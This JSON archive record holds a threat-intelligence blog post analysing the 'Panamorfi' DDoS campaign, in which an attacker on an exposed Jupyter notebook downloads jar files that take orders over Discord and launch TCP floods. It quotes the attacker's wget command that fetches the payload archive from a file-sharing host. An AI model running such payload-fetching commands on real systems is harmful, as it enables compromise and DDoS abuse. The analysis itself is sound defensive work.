{
	"id": "2a6f8194-ae54-4ab0-8028-2d141b641923",
	"created_at": "2026-04-10T03:21:44.691322Z",
	"updated_at": "2026-04-10T03:22:18.759293Z",
	"deleted_at": null,
	"sha1_hash": "9d58188aadf1012ce230e23ad86ae8ace7ccd1f2",
	"title": "Panamorfi: A New Discord DDoS Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3160385,
	"plain_text": "Panamorfi: A New Discord DDoS Campaign\r\nBy Assaf Morag\r\nPublished: 2024-08-02 · Archived: 2026-04-10 03:15:44 UTC\r\nAqua Nautilus researchers uncovered a new Distributed Denial of Service (DDoS) campaign dubbed ‘Panamorfi’. The threat actor launches the DDoS using mineping, a Minecraft DDoS package written in Java. Thus far we’ve only seen it deployed via misconfigured Jupyter notebooks. In this blog we explain the attack, the techniques used by the threat actor and how to protect your environments.\r\nAttack flow\r\nThe threat actor ‘yawixooo’ gained initial access to our internet-exposed Jupyter notebook honeypot, then ran the following command:\r\n‘wget https://filebin.net/archive/h4fhifnlykw224h9/zip’\r\nThis downloaded a zip file with the random name h4fhifnlykw224h9, which was new on VirusTotal and had only 1 detection, by ESET. The zip file (MD5: 42989a405c8d7c9cb68c323ae9a9a318) is ~17 MB in size and contains 2 Jar files.\r\nFigure 1: The zip file with a single detection\r\nhttps://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/\r\nPage 1 of 7\r\nThese two Jar files were also new in VT and had only 1 detection each, by ESET.\r\nFigure 2: The conn.jar file with a single detection\r\nFigure 3: The mineping.jar file with a single detection\r\nThe connector Jar file contains the initial execution code. As depicted below in the main function, the threat actor uses Discord to control the DDoS attack. The victim’s machine connects to the Discord channel using the credentials specified below.\r\nFigure 4: The main function of connector jar\r\nIt loads mineping.jar, a known Minecraft server DDoS tool whose code is available on GitHub. You can see in the code that the mineping.jar package is loaded in order to launch a TCP flood DDoS attack. This attack aims to consume the resources of the target server by sending a large number of TCP connection requests. The results are written to the Discord channel.\r\nFigure 5: The function that updates the Discord channel\r\nYou can also see that the threat actor identifies as ‘yawixooo’, loading a signature photo, enclosed below.\r\nFigure 6: The Panamorfi DDoS logo\r\nThe package mineping.jar contains 12 Java files that enable, among other things, loading an HTTP socket, using a proxy, flooding a victim, and creating random connection details.\r\nThe threat actor\r\nThe threat actor identified themselves in the code as ‘yawixooo’, which can be found on GitHub. At the time of our investigation, the public repository appears to be active. It contains a Minecraft server configuration and an HTML page that is currently under construction.\r\nFigure 7: The GitHub profile of the threat actor\r\nFigure 8: The website of the threat actor under construction\r\nDetection and remediation with Aqua’s CNAPP\r\nIn this blog we covered an attack against a Jupyter notebook. Usually, data practitioners such as data engineers, data analysts and data scientists are the ones who use these kinds of applications. Data practitioners often lack the necessary knowledge and understanding; thus, they sometimes leave room for misconfigurations or vulnerabilities.\r\nIn this case, we leveraged Aqua’s Runtime Protection solution to detect the drift event and block its execution. Aqua’s advanced behavioral detection capabilities identify malicious or suspicious behavior at runtime, and the granular runtime policies effectively block the events in real time. While vulnerability management and misconfiguration remediation are important for an overall cloud native security posture, we must assume that an attacker can gain access by exploiting a zero-day or unpatched vulnerability or misconfiguration.\r\nIn this attack the next link in the attack kill chain (after the misconfiguration) is the payload. We assume that we can limit our data practitioners from executing anything outside the scope of the Jupyter notebook. Thus, we set our controls to block, as can be seen in Figure 9 below.\r\nFigure 9: The Jupyter notebook container runtime policy is set to block any drift (an attempt to run an executable not in the original image)\r\nAs you can see in Figure 10 below, our runtime policy blocks the file conn.jar from running. This de facto kills the entire attack.\r\nFigure 10: Aqua’s runtime protection completely blocks the attack before it even started\r\nAssaf is the Director of Threat Intelligence at Aqua Nautilus. He is responsible for acquiring threat intelligence related to the software development life cycle in cloud native environments, supports the team's data needs, and helps Aqua and the ecosystem remain at the forefront of emerging threats and protective methodologies. His research has been featured in leading information security publications and journals worldwide, and he has presented at leading cybersecurity conferences. Notably, Assaf has also contributed to the development of the new MITRE ATT\u0026CK Container Framework.\r\nAssaf is leading an O’Reilly course focusing on cyber threat intelligence in cloud-native environments. The course covers both theoretical concepts and practical applications, providing valuable insights into the unique challenges and strategies associated with securing cloud-native infrastructures.\r\nSource: https://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/"
	],
	"report_names": [
		"panamorfi-a-new-discord-ddos-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775791304,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9d58188aadf1012ce230e23ad86ae8ace7ccd1f2.pdf",
		"text": "https://archive.orkl.eu/9d58188aadf1012ce230e23ad86ae8ace7ccd1f2.txt",
		"img": "https://archive.orkl.eu/9d58188aadf1012ce230e23ad86ae8ace7ccd1f2.jpg"
	}
}